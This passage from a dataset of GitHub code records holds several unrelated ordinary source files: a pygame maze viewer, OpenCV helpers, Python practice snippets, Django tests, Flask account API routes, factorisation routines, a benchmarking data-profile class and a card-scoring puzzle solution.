= False\n        \n        clock = pygame.time.Clock()\n        \n        while self.running:\n            pygame.event.pump()\n            clock.tick(self.fps)\n            \n            for event in pygame.event.get():\n                if event.type == pygame.QUIT:\n                    raise SystemExit\n                elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n                    raise SystemExit\n                elif event.type == pygame.KEYDOWN and self.human:\n                    try:\n                        move = {\n                            pygame.K_RIGHT : ( 0, 1, 0),\n                            pygame.K_LEFT : ( 0, -1, 0),\n                            pygame.K_UP : (-1, 0, 0),\n                            pygame.K_DOWN : ( 1, 0, 0),\n                            pygame.K_u : ( 0, 0, 1),\n                            pygame.K_d : ( 0, 0,-1)\n                        }[event.key] \n                        path.extend(self.agent.move(move))\n                    except KeyError: \n                        pass\n            \n            self.loop(path + [self.agent.position])\n    \n    def unravel_idx(self, i, j, k):\n        # helper to convert to 2d coordinates\n        return (i, j + k * (self.width + 2))\n\n    # The game loop is where everything is drawn to the context. Only called when a human is playing\n    def loop(self, path):\n        self.draw_path(path)\n        self.draw_objectives()\n        self.draw_player()\n        pygame.display.flip()\n\n    # Draws the path (given as a list of (row, col, level) tuples) to the display context\n    def draw_path(self, path):\n        for x, coord in enumerate(path):\n            self.draw_square(*self.unravel_idx(*coord), self.gradient[x, len(path)])\n    \n    # Draws the full maze to the display context\n    def draw_maze(self):\n        n, m, h = self.maze.getDimensions()\n        for i in range(n):\n            for j in range(m):\n                for k in range(h):\n                    if self.maze[i, j, k] == WALL_CHAR:\n                        self.draw_square(*self.unravel_idx(i, j, k))\n    \n    def draw_square(self, i, j, color = (0, 0, 0)):\n        pygame.draw.rect(self.surface, color, tuple(i * self.scale for i in (j, i, 1, 1)), 0)\n    \n    def draw_circle(self, i, j, color = (0, 0, 0), radius = None):\n        if radius is None:\n            radius = self.scale / 4\n        pygame.draw.circle(self.surface, color, tuple(int((i + 0.5) * self.scale) for i in (j, i)), int(radius))\n\n    # Draws the player to the display context, and draws the path moved (only called if there is a human player)\n    def draw_player(self):\n        self.draw_circle(*self.unravel_idx(*self.agent.position) , (0, 0, 255))\n\n    # Draws the waypoints to the display context\n    def draw_objectives(self):\n        for i, j, k in self.maze.getObjectives():\n            self.draw_circle(*self.unravel_idx(i, j, k))\n\n    # Draws start location of path\n    def draw_start(self):\n        i, j, k = self.maze.getStart()\n        pygame.draw.rect(self.surface, (0, 0, 255), tuple(int(i * self.scale) for i in (j + 0.25, i + k * (self.width + 2) + 0.25, 0.5, 0.5)), 0)\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(\n        description = 'CS440 MP2 part 1', \n        formatter_class = argparse.ArgumentDefaultsHelpFormatter)\n\n    parser.add_argument('path',\n                        help = 'path to maze file')\n    parser.add_argument('--search', dest = 'search', type = str, default = 'bfs',\n                        choices = ('bfs',), \n                        help = 'search method')\n    parser.add_argument('--scale', dest = 'scale', type = int, default = 20,\n                        help = 'display scale')\n    parser.add_argument('--fps', dest = 'fps', type = int, default = 30,\n                        help = 'display framerate')\n    parser.add_argument('--human', default = False, action = 'store_true',\n                        help = 'run in human-playable mode')\n    parser.add_argument('--save', dest = 'save', type = str, default = None,\n                        help = 'save output to image file')\n    parser.add_argument('--altcolor', dest = 'altcolor', default = False, action = 'store_true',\n                        help = 'view in an alternate color scheme')\n\n    arguments = parser.parse_args()\n    application = Application(arguments.human, arguments.scale, arguments.fps, arguments.altcolor)\n    application.run(\n        filepath = 
arguments.path, \n mode = arguments.search, \n save = arguments.save)","repo_name":"3180110750/CS440","sub_path":"MP2 Robotics/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":8194,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"30056786593","text":"import gc\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef nms(image, k=13, remove_plateaus_delta=-1.0):\n # https://stackoverflow.com/a/21023493/5630599\n #\n kernel = np.ones((k, k))\n # kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (k, k))\n mask = cv2.morphologyEx(image, cv2.MORPH_DILATE, kernel)\n mask = cv2.compare(image, mask, cv2.CMP_GE)\n if remove_plateaus_delta >= 0.0:\n kernel = np.ones((k, k))\n non_plateau_mask = cv2.morphologyEx(image, cv2.MORPH_ERODE, kernel)\n\n # non_plateau_mask = cv2.compare(image, non_plateau_mask, cv2.CMP_GT)\n cond = (image - non_plateau_mask) > remove_plateaus_delta\n non_plateau_mask = cond.astype(np.uint8) * 255\n mask = cv2.bitwise_and(mask, non_plateau_mask)\n\n return mask\n\n\ndef zero_crossing(image):\n # Detect zero-crossing\n # https://stackoverflow.com/a/48440931/\n\n # kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\n kernel = np.ones((3, 3))\n l_o_g = cv2.Laplacian(image, cv2.CV_32F)\n min_l_o_g = cv2.morphologyEx(l_o_g, cv2.MORPH_ERODE, kernel)\n max_l_o_g = cv2.morphologyEx(l_o_g, cv2.MORPH_DILATE, kernel)\n zero_cross = np.logical_or(np.logical_and(min_l_o_g < 0, l_o_g > 0), np.logical_and(max_l_o_g > 0, l_o_g < 0))\n\n return zero_cross\n\n\ndef grad_magn(gray, fx=None, fy=None, ddepth=cv2.CV_32F):\n scale = 1\n delta = 0\n if True:\n # Here said(see Notes) that cv2.Scharr better than cv2.Sobel\n # https://docs.opencv.org/2.4/doc/tutorials/imgproc/imgtrans/sobel_derivatives/sobel_derivatives.html#formulation\n if fx is None:\n grad_x = cv2.Scharr(gray, ddepth, 1, 0, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n else:\n grad_x = cv2.Scharr(fx, ddepth, 1, 0, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n if fy is None:\n grad_y = cv2.Scharr(gray, ddepth, 0, 1, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n else:\n grad_y = cv2.Scharr(fy, ddepth, 0, 1, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n\n dtype = grad_x.dtype\n grad_x = np.floor_divide(grad_x, 32, grad_x) # (grad_x / 32).astype(dtype)\n grad_y = np.floor_divide(grad_y, 32, grad_y) # (grad_y / 32).astype(dtype)\n grad = np.sqrt(grad_x ** 2 + grad_y ** 2).astype(dtype) if gray is not None else None\n gc.collect()\n return grad, grad_x, grad_y\n\n raise NotImplementedError\n\n grad_x = cv2.Sobel(gray, ddepth, 1, 0, ksize=3, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n grad_y = cv2.Sobel(gray, ddepth, 0, 1, ksize=3, scale=scale, delta=delta, borderType=cv2.BORDER_DEFAULT)\n\n # Because Sobel uses kernel with sum of weights 2*4.\n # So result should be divided by 8\n grad_x /= 8.0\n grad_y /= 8.0\n grad = np.sqrt(grad_x**2 + grad_y**2)\n return grad, grad_x, grad_y\n\n\n# helper function for data visualization\ndef denormalize(x):\n \"\"\"Scale image to range 0..1 for correct plot\"\"\"\n x_max = np.percentile(x, 98)\n x_min = np.percentile(x, 2)\n x = (x - x_min) / (x_max - x_min)\n x = x.clip(0, 1)\n return x\n\n\ndef visualize(title, img_fname, **images):\n \"\"\"PLot images in one row.\"\"\"\n img_filtered = {key: value for (key, value) in images.items() if value is not None}\n n = len(img_filtered)\n fig = plt.figure(figsize=(16, 16))\n for i, 
(name, img) in enumerate(img_filtered.items()):\n plt.subplot(1, n, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.title(' '.join(name.split('_')).title())\n plt.imshow(img)\n if title is not None:\n fig.suptitle(title, fontsize=16)\n if img_fname is not None:\n plt.savefig(img_fname)\n else:\n plt.show()\n plt.close(fig)\n\n\ndef get_contours(mask_u8cn, find_alg=cv2.CHAIN_APPROX_SIMPLE, find_mode=cv2.RETR_EXTERNAL, inverse_mask=False):\n if len(mask_u8cn.shape) < 3:\n mask_u8cn = mask_u8cn[..., np.newaxis]\n if inverse_mask:\n mask_u8cn = 255 - mask_u8cn\n\n class_nb = max(1, mask_u8cn.shape[2] - 1)\n contours_list = list()\n\n # Collect contours except background\n for i in range(class_nb):\n ret, thresh = cv2.threshold(mask_u8cn[..., i], 127, 255, cv2.THRESH_BINARY)\n\n if cv2.__version__.startswith(\"3\"):\n im, contours, hierarchy = cv2.findContours(thresh, find_mode, find_alg)\n else:\n contours, hierarchy = cv2.findContours(thresh, find_mode, find_alg)\n\n if find_mode == cv2.RETR_TREE:\n #\n # To describe relation in hierarchy with type cv2.RETR_TREE\n # hierarchy[0][i] = [next sibling, prev sibling, child, parent]\n #\n \"\"\"\n grand = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] >= 0 and hierarchy[0][i][3] < 0] # NO parents HAVE children\n logging.info('len(grand): {}'.format(len(grand)))\n holes = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] < 0 and hierarchy[0][i][3] >= 0] # HAVE parents NO children\n logging.info('len(holes): {}'.format(len(holes)))\n ones = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] < 0 and hierarchy[0][i][3] < 0] # NO parents NO children\n logging.info('len(ones): {}'.format(len(ones)))\n siblings = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] < 0 and hierarchy[0][i][3] >= 0 and\n (hierarchy[0][i][0] >= 0 or hierarchy[0][i][1] >= 0) ] # HAVE parents NO childs HAVE SIBLINGS\n logging.info('len(siblings): {}'.format(len(siblings)))\n \"\"\"\n # Pay attention - if objects are black which put on white background -\n # each objects will be a child, and main parent - image rectangle\n c1 = [contours[i] for i in range(len(contours)) if\n hierarchy[0][i][2] < 0 and hierarchy[0][i][3] >= 0] # HAVE parents NO children\n # Collect objects which are not main parent(image rect) i.e. 
HAVE parents and HAVE children -\n            # these can be large objects with smaller objects lying on top of them\n            c2 = [contours[i] for i in range(len(contours)) if\n                  hierarchy[0][i][2] >= 0 and hierarchy[0][i][3] >= 0] # HAVE parents HAVE children\n            contours = c1 + c2\n\n        # Filter out non-manifold contours\n        contours = list(filter(lambda x: len(x) > 2, contours))\n\n        contours_list.append(contours)\n\n    return contours_list\n\n\ndef write_text(img_rgb, text, bottom_left_corner_of_text, fontColor, font_scale=1):\n    font = cv2.FONT_HERSHEY_SIMPLEX\n    line_type = 2\n\n    cv2.putText(img_rgb, text,\n                bottom_left_corner_of_text,\n                font,\n                font_scale,\n                (0, 0, 0),\n                thickness=4,\n                lineType=line_type)\n\n    cv2.putText(img_rgb, text,\n                bottom_left_corner_of_text,\n                font,\n                font_scale,\n                fontColor,\n                thickness=1,\n                lineType=line_type)\n","repo_name":"oradzhabov/bigimage","sub_path":"kutils/utilites.py","file_name":"utilites.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4725987268","text":"#lambda\n(lambda a,b : print(a+b))(1,2)\n\nsuma = lambda a,b : print(a+b)\nsuma(1,2)\n\n(lambda *n : print(sum(n)))(*list(range(1,101,1)))\n\ndef multiplicador(n):\n    return lambda a:print(a*n)\n\nduplicador = multiplicador(2)\ntriplicador = multiplicador(3)\nduplicador(11)\ntriplicador(10)\n\n#input\n# x = int(input(\"fsdfksdf\"));\n\n#trycatch\ntry:\n    print(1/0)\nexcept Exception as s:\n    print(\"Error\", s)\nelse:\n    print(\"No failures\")\nfinally:\n    print(\"Runs no matter what\")\n\n\n#assert\ndef suma(a,b):\n    try:\n        assert(type(a) == int)\n        assert(type(b) == int)\n    except AssertionError:\n        print(\"Invalid data type\")\n    else:\n        print(a+b)\n\nsuma(2,\"D\")\nsuma(2,2)","repo_name":"AeaX2311/PracticasPython","sub_path":"Unidad 1/Lambda - input - assert - try.py","file_name":"Lambda - input - assert - try.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33347926213","text":"from django.test import TestCase\nfrom django.urls import resolve\nfrom note.views import home_page\nfrom note.models import Name,Item\nclass liveViewTest(TestCase):\n    def test_first_returns_correct_html(self):#test the home page template\n        respose = self.client.get('/')\n        self.assertTemplateUsed(respose, 'home.html') # check which template rendered the response\n\n    def test_can_Skip_a_POST_request(self): # test that a POST to the home page redirects to the corresponding page\n        response = self.client.post('/', data={'name_text': 'cmy'})\n        self.assertRedirects(response, '/note/cmy') # test the redirect\n\n    def test_can_saved_first_post(self):#test that data submitted on the home page is stored in the database\n        response = self.client.post('/', data={'name_text': 'cmy'})\n        new_name=Name.objects.first()\n        self.assertEqual(new_name.name,'cmy')\n        response = self.client.post('/', data={'name_text': 'cmy'})#test that submitting the same name again is not saved twice\n        name_list=Name.objects.all()\n        self.assertEqual(name_list.count(),1)\n\n    def test_note_returns_correct_html(self):#test the note template\n        Name.objects.create(name='cmy')\n        respose = self.client.get('/note/cmy')\n        self.assertTemplateUsed(respose, 'node.html') # check which template rendered the response\n\n    def test_second_returns_correct_html(self): # test that the URL parameter reaches the view template and is handled correctly\n        Name.objects.create(name='cmy')\n        respose = self.client.get('/note/cmy')#visit the node template for a name that exists\n        self.assertIn('cmy', respose.content.decode())\n        respose = self.client.get('/note/cmy1') # visit the node template for a name that does not exist\n        self.assertNotIn('cmy1', respose.content.decode())\n        self.assertRedirects(respose, '/')\n\n    def test_second_saved_post(self):#test saving from the note page\n        
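# create the user first, then post an item and check that exactly one Item row was stored\n        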
Name.objects.create(name='cmy')\n        response = self.client.post('/note/cmy', data={'list_text': 'test1'})\n        self.assertEqual(Item.objects.count(), 1) # check that data entered in the front end reaches the database\n        new_item = Item.objects.first()\n        self.assertEqual('test1', new_item.text)\n\n    def test_Item_display_correct(self):#test that stored items are displayed correctly\n        Name.objects.create(name='cmy')\n        respose = self.client.get('/note/cmy')#visit before any item is stored\n        self.assertNotIn('1:test1', respose.content.decode())\n        response = self.client.post('/note/cmy', data={'list_text': 'test1'})\n        self.assertIn('1:test1', response.content.decode())#after storing, in the POST response\n        respose = self.client.get('/note/cmy')#after storing, in a GET response\n        self.assertIn('1:test1', respose.content.decode())\n\nclass TestModel(TestCase): # test the database (module-level so the test runner discovers it)\n    def test_saving_and_retrieving_items(self): # test that the database stores data correctly\n        input_name='cmy'\n        saved_Name = Name.objects.create(name=input_name)\n        Item.objects.create(name=saved_Name,text='test1')\n        Item.objects.create(name=saved_Name, text='test2')\n        item=saved_Name.item_set.all()\n        first_saved=item[0]\n        second_saved=item[1]\n        self.assertEqual(first_saved.text, 'test1') # check the Item rows were saved\n        self.assertEqual(second_saved.text, 'test2')\n        saved_Name_list = Name.objects.first()#check the first row saved in the Name table\n        self.assertEqual(saved_Name, saved_Name_list)\n# Create your tests here.\n","repo_name":"smartfish007/githubtest","sub_path":"NotePad/note/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39911138784","text":"from flask import request, jsonify, abort\nfrom opencampus.common import modulemanager\nfrom opencampus.common.models import Campus\nfrom opencampus.module.account.models import Account\n\n\n@modulemanager.api_route('account', '/v1/accounts/me')\ndef account_me_info():\n    if not request.access_token or request.access_token.access_obj_type != 'account':\n        return jsonify({'error': {'code': 'not_found_account_access_token'}}), 403\n\n    try:\n        account = Account.objects(id=request.access_token.access_obj_id).get()\n    except Account.DoesNotExist:\n        return jsonify({'error': {'code': 'not_found_account'}}), 404\n\n    info = {\n    }\n\n    if 'get_account' in request.access_token.scope:\n        campus = Campus.objects(id=account.campus_id).get()\n        info.update({\n            'id': str(account.id),\n            'campus': {\n                'id': account.campus_id,\n                'univ_name': campus.univ_name,\n                'univ_type': campus.univ_type,\n                'campus_name': campus.campus_name\n            }\n        })\n\n    if 'get_student_id' in request.access_token.scope:\n        info.update({\n            'student_id': account.student_id\n        })\n\n    return jsonify(info)\n\n\n@modulemanager.api_route('account', '/v1/accounts/me/grade')\ndef account_me_grade():\n    if not request.access_token or request.access_token.access_obj_type != 'account':\n        return jsonify({'error': {'code': 'not_found_account_access_token'}}), 403\n\n    try:\n        account = Account.objects(id=request.access_token.access_obj_id).get()\n    except Account.DoesNotExist:\n        return jsonify({'error': {'code': 'not_found_account'}}), 404\n\n    if 'get_grade' not in request.access_token.scope:\n        return jsonify({'error': {'code': 'error_scope'}}), 403\n\n    campus = Campus.objects(id=account.campus_id).get()\n\n    return jsonify({\n        'data': campus.get_gateway().get_student_grade(account)\n    })\n\n\n@modulemanager.api_route('account', '/v1/account/change_campus_data', methods=['PUT'])\ndef account_change_auth_info():\n    request_data = request.get_json()\n    campus_id = request_data.get('campus_id')\n    student_id = request_data.get('student_id')\n\n    
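# Resolve the campus before entering the gateway-only section below, so an\n    # unknown campus_id fails fast with a 400.\n    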
try:\n request.campus = Campus.objects(id=campus_id).get()\n except Campus.DoesNotExist:\n return jsonify({'error': {'code': 'not_found_campus'}}), 400\n\n @modulemanager.gateway_only\n def change_auth_info():\n try:\n account = Account.objects(campus_id=campus_id, student_id=student_id).get()\n except Account.DoesNotExist:\n return jsonify({'error': {'code': 'not_found_account'}}), 404\n\n if 'auth_info' in request_data:\n account.auth_info = request_data.get('auth_info')\n if 'name' in request_data:\n account.name = request_data.get('name')\n if 'departments' in request_data:\n account.departments = request_data.get('departments')\n account.save()\n return jsonify({'state': 'ok'})\n\n return change_auth_info()\n","repo_name":"shlee322/opencampus","sub_path":"opencampus/module/account/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"7599472106","text":"from typing import List, Callable\nimport math\nimport time\n\n\ndef naive_trial_factorisation(n: int) -> List[int]:\n '''\n Tests all i from 2 to n.\n If i divides n, then i is a factor, continue algorithm with n/i.\n Repeat until n is fully factorised.\n '''\n\n factors = [1]\n\n completely_factored = False\n while not completely_factored:\n for i in range(2, math.floor(math.sqrt(n)) + 1):\n if n % i == 0:\n factors.append(i)\n n = int(n / i)\n break\n else:\n factors.append(n)\n completely_factored = True\n\n return factors\n\n\ndef fermat_factorisation(n: int) -> (int, int):\n '''\n Tests all t from sqrt(n) to n.\n If s^2 = t^2 - n is a square, then return n = ab = (t + s)(t - s).\n '''\n\n if n % 2 == 0:\n return (int(n / 2), 2)\n\n for t in range(math.ceil(math.sqrt(n)), n + 1):\n s_squared = t ** 2 - n\n s = math.sqrt(s_squared)\n\n if int(s) == math.sqrt(s_squared):\n return [int(s + t), int(t - s)]\n\n\ndef fully_factorise(n: int, f: Callable) -> (int, int):\n ''' \n Given a factorisation function that ouputs 2 factors,\n this function will recursively factor\n until we reach have reached prime factorisation.\n '''\n\n if n == 1:\n return [1]\n else:\n num0, num1 = f(n)\n if num0 == n or num1 == n:\n return [n]\n else:\n return fully_factorise(num0, f) + fully_factorise(num1, f)\n\n\nif __name__ == \"__main__\":\n start = time.time()\n print(naive_trial_factorisation(1373 * 1291 * 1223))\n end = time.time()\n print(f\"Time taken for trial factorisation: {round(end - start, 5)}\")\n\n start = time.time()\n print(fermat_factorisation(1373 * 1291 * 1223))\n end = time.time()\n print(f\"Time taken for 2-Fermat factorisation: {round(end - start, 5)}\")\n\n start = time.time()\n print(fully_factorise(1373 * 1291 * 1223, fermat_factorisation))\n end = time.time()\n print(f\"Time taken for full-Fermat factorisation: {round(end - start, 5)}\")\n","repo_name":"V-Wong/MATH3411","sub_path":"factorisation_methods.py","file_name":"factorisation_methods.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"478337323","text":"from __future__ import annotations\n\nfrom collections.abc import Iterable\nfrom collections.abc import Mapping\nfrom collections.abc import Sequence\nfrom typing import TYPE_CHECKING\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom gemseo.utils.matplotlib_figure import save_show_figure\nfrom numpy import array\nfrom numpy import linspace\nfrom numpy import ndarray\nfrom numpy import 
zeros\n\nfrom gemseo_benchmark import COLORS_CYCLE\nfrom gemseo_benchmark import MarkeveryType\nfrom gemseo_benchmark import get_markers_cycle\nfrom gemseo_benchmark.results.performance_history import PerformanceHistory\n\nif TYPE_CHECKING:\n    from numbers import Number\n    from pathlib import Path\n\n    from matplotlib.figure import Figure\n\n    from gemseo_benchmark.data_profiles.target_values import TargetValues\n\n\nclass DataProfile:\n    \"\"\"Data profile that compares iterative algorithms on reference problems.\n\n    A data profile is an empirical cumulative distribution function of the number of\n    problem functions evaluations required by an algorithm to reach a reference\n    problem target.\n    \"\"\"\n\n    def __init__(self, target_values: Mapping[str, TargetValues]) -> None:\n        \"\"\"\n        Args:\n            target_values: The target values of each of the reference problems.\n        \"\"\" # noqa: D205, D212, D415\n        self.__targets_number = 0\n        self.target_values = target_values\n        self.__values_histories = {}\n\n    @property\n    def target_values(self) -> dict[str, TargetValues]:\n        \"\"\"The target values of each reference problem.\n\n        Target values are a scale of objective function values,\n        ranging from an easily achievable one to the best known value.\n        A data profile is computed by counting the number of targets reached by an\n        algorithm at each iteration.\n\n        Raises:\n            TypeError: If the target values are not passed as a mapping.\n            ValueError: If the reference problems have different numbers of target\n                values.\n        \"\"\"\n        return self.__target_values\n\n    @target_values.setter\n    def target_values(self, target_values: Mapping[str, TargetValues]) -> None:\n        if not isinstance(target_values, Mapping):\n            raise TypeError(\"The target values must be passed as a mapping\")\n\n        targets_numbers = {len(pb_targets) for pb_targets in target_values.values()}\n        if len(targets_numbers) != 1:\n            raise ValueError(\n                \"The reference problems must have the same number of target values.\"\n            )\n\n        self.__target_values = dict(target_values)\n        self.__targets_number = targets_numbers.pop()\n\n    def add_history(\n        self,\n        problem_name: str,\n        algorithm_configuration_name: str,\n        objective_values: Sequence[float],\n        infeasibility_measures: Sequence[float] | None = None,\n        feasibility_statuses: Sequence[bool] | None = None,\n    ) -> None:\n        \"\"\"Add a history of performance values.\n\n        Args:\n            problem_name: The name of the problem.\n            algorithm_configuration_name: The name of the algorithm configuration.\n            objective_values: A history of objective values.\n                N.B. 
the value at index ``i`` is assumed to have been obtained with\n ``i+1`` evaluations.\n infeasibility_measures: A history of infeasibility measures.\n If ``None`` then measures are set to zero in case of feasibility and set\n to infinity otherwise.\n feasibility_statuses: A history of (boolean) feasibility statuses.\n If ``None`` then feasibility is always assumed.\n\n Raises:\n ValueError: If the problem name is not the name of a reference problem.\n \"\"\"\n if problem_name not in self.__target_values:\n raise ValueError(f\"{problem_name!r} is not the name of a reference problem\")\n if algorithm_configuration_name not in self.__values_histories:\n self.__values_histories[algorithm_configuration_name] = {\n pb_name: [] for pb_name in self.__target_values\n }\n history = PerformanceHistory(\n objective_values, infeasibility_measures, feasibility_statuses\n )\n self.__values_histories[algorithm_configuration_name][problem_name].append(\n history\n )\n\n def plot(\n self,\n algo_names: Iterable[str] | None = None,\n show: bool = True,\n file_path: str | Path | None = None,\n markevery: MarkeveryType = 0.1,\n ) -> None:\n \"\"\"Plot the data profiles of the required algorithms.\n\n Args:\n algo_names: The names of the algorithms.\n If ``None`` then all the algorithms are considered.\n show: If True, show the plot.\n file_path: The path where to save the plot.\n If ``None``, the plot is not saved.\n markevery: The sampling parameter for the markers of the plot.\n Refer to the Matplotlib documentation.\n \"\"\"\n if algo_names is None:\n algo_names = ()\n\n data_profiles = self.compute_data_profiles(*algo_names)\n figure = self._plot_data_profiles(data_profiles, markevery)\n save_show_figure(figure, show, file_path)\n\n def compute_data_profiles(self, *algo_names: str) -> dict[str, list[Number]]:\n \"\"\"Compute the data profiles of the required algorithms.\n\n For each algorithm, compute the cumulative distribution function of the number\n of evaluations required by the algorithm to reach a reference target.\n\n Args:\n algo_names: The names of the algorithms.\n If ``None`` then all the algorithms are considered.\n\n Returns:\n The data profiles.\n \"\"\"\n data_profiles = {}\n if not algo_names:\n algo_names = self.__values_histories.keys()\n\n for name in algo_names:\n total_hits_history = self.__compute_hits_history(name)\n problems_number = len(self.__target_values)\n repeat_number = self.__get_repeat_number(name)\n targets_total = self.__targets_number * problems_number * repeat_number\n ratios = total_hits_history / targets_total\n data_profiles[name] = ratios.tolist()\n return data_profiles\n\n def __compute_hits_history(self, algo_name: str) -> ndarray:\n \"\"\"Compute the history of the number of target hits of an algorithm.\n\n Args:\n algo_name: The name of the algorithm.\n\n Returns:\n The history of the number of target hits.\n \"\"\"\n algo_histories = self.__values_histories[algo_name]\n\n # Compute the maximal size of an optimization history\n max_history_size = max([\n max([len(pb_history) for pb_history in algo_history])\n for algo_history in algo_histories.values()\n ])\n\n # Compute the history of the number of target hits across all optimizations\n total_hits_history = zeros(max_history_size)\n for pb_name, targets in self.__target_values.items():\n for pb_history in algo_histories[pb_name]:\n hits_history = targets.compute_target_hits_history(pb_history)\n # If the history is shorter than the longest one, repeat its last value\n if len(hits_history) < max_history_size:\n 
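# e.g. a hits history [0, 1, 2] padded to length 5 becomes [0, 1, 2, 2, 2]\n                    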
tail = [hits_history[-1]] * (max_history_size - len(hits_history))\n hits_history.extend(tail)\n\n total_hits_history += array(hits_history)\n\n return total_hits_history\n\n def __get_repeat_number(self, algo_name: str) -> int:\n \"\"\"Check that an algorithm has the same number of histories for each problem.\n\n Make sure that the reference problems are equally represented with respect to\n the algorithm performance.\n\n Args:\n algo_name: The name of the algorithm.\n\n Returns:\n The common number of values histories per problem.\n\n Raises:\n ValueError: If the algorithm does not have the same number of histories\n for each problem.\n \"\"\"\n histories_numbers = {\n len(histories) for histories in self.__values_histories[algo_name].values()\n }\n if len(histories_numbers) != 1:\n raise ValueError(\n f\"Reference problems unequally represented for algorithm {algo_name!r}.\"\n )\n return histories_numbers.pop()\n\n @staticmethod\n def _plot_data_profiles(\n data_profiles: Mapping[str, Sequence[Number]], markevery: MarkeveryType = 0.1\n ) -> Figure:\n \"\"\"Plot the data profiles.\n\n Args:\n data_profiles: The data profiles.\n markevery: The sampling parameter for the markers of the plot.\n Refer to the Matplotlib documentation.\n\n Returns:\n The data profiles figure.\n \"\"\"\n fig = plt.figure()\n axes = fig.add_subplot(1, 1, 1)\n\n # Set the title and axes\n axes.set_title(f\"Data profile{'s' if len(data_profiles) > 1 else ''}\")\n max_profile_size = max([len(profile) for profile in data_profiles.values()])\n axes.xaxis.set_major_locator(matplotlib.ticker.MaxNLocator(integer=True))\n plt.xlabel(\"Number of functions evaluations\")\n plt.xlim([1, max_profile_size])\n y_ticks = linspace(0.0, 1.0, 11)\n plt.yticks(y_ticks, (f\"{ratio * 100.0:02.0f}%\" for ratio in y_ticks))\n plt.ylabel(\"Ratios of targets reached\")\n plt.ylim([0.0, 1.05])\n\n # Plot the 100% line\n axes.axhline(1.0, linestyle=\":\", color=\"black\")\n\n # Plot the data profiles\n for color, marker, (name, profile) in zip(\n COLORS_CYCLE, get_markers_cycle(), data_profiles.items()\n ):\n # Plot the data profile\n profile_size = len(profile)\n axes.plot(\n range(1, profile_size + 1),\n profile,\n color=color,\n label=name,\n marker=marker,\n markevery=markevery,\n )\n\n # Extend the profile with an horizontal line if necessary\n if profile_size < max_profile_size:\n tail_size = max_profile_size - profile_size + 1\n last_value = profile[-1]\n axes.plot(\n range(profile_size, profile_size + tail_size),\n [last_value] * tail_size,\n color=color,\n linestyle=\"dotted\",\n )\n # Mark the last entry of the data profile\n axes.plot(profile_size, last_value, marker=\"*\", color=color)\n plt.legend()\n\n return fig\n","repo_name":"gemseo/gemseo-benchmark","sub_path":"src/gemseo_benchmark/data_profiles/data_profile.py","file_name":"data_profile.py","file_ext":"py","file_size_in_byte":10822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2128036317","text":"arr =[input().split() for _ in range(5)]\n\nres = []\ndef first(arr):\n arr = sorted(arr, key=lambda x: x[1])\n for i in range(len(arr)-1):\n if arr[i][0] != arr[i+1][0] or (arr[i][1])+1 != arr[i+1][1]:\n return 0\n return sorted(arr, key=lambda x: x[1], reverse= True)[0][1]+900\n\ndef sec_thr_six_sev_eig(arr):\n tmp = [str(i[1])for i in arr] # 1 1 1 1 2\n count = 0\n if len(set(tmp)) == 2:\n for i in set(tmp):\n c = [''.join(tmp).count(i), i]\n if c[0]== 1:\n pass\n elif c[0] == 4:\n return 800+ int(c[1])\n elif 
c[0] == 3:\n                count += (int(c[1]) * 10)\n            else:\n                count += int(c[1])+700\n        return count if count != 0 else 0 \n    elif len(set(tmp)) == 3:\n        count=[]\n        for i in set(tmp):\n            c = [''.join(tmp).count(i), i]\n            if c[0] == 3:\n                return int(c[1]) + 400\n            elif c[0] == 2:\n                count.append(int(c[1]))\n        return max(count)*10 + min(count)+300\n    elif len(set(tmp)) ==4:\n        for i in set(tmp):\n            c = [''.join(tmp).count(i), i]\n            if c[0] == 2:\n                return int(c[1]) + 200\n    return 0\n\ndef fourth(arr):\n    tmp = [i[0] for i in arr]\n    if len(set(tmp)) == 1:\n        return sorted(arr, key=lambda x: x[1], reverse=True)[0][1] + 600\n    return 0\n\ndef fifth(arr):\n    arr = sorted(arr, key=lambda x: x[1])\n    if all(arr[i][1]+1 ==arr[i+1][1] for i in range(len(arr)-1)):\n        return arr[-1][1] + 500\n    return 0\n\n\n\n\nfor i in arr:\n    i[1] = int(i[1])\na = max(first(arr),sec_thr_six_sev_eig(arr), fourth(arr), fifth(arr))\nprint(sorted(arr, key=lambda x: x[1])[-1][1]+100 if a == 0 else a)\n \n# a = [1,2,2,2]\n# print([ str(i) for i in set(a)])\n# print(a)\n\n# 50\n# 702","repo_name":"jinn2u/algorithm","sub_path":"백준/구현/2621.py","file_name":"2621.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20213288428","text":"from abc import 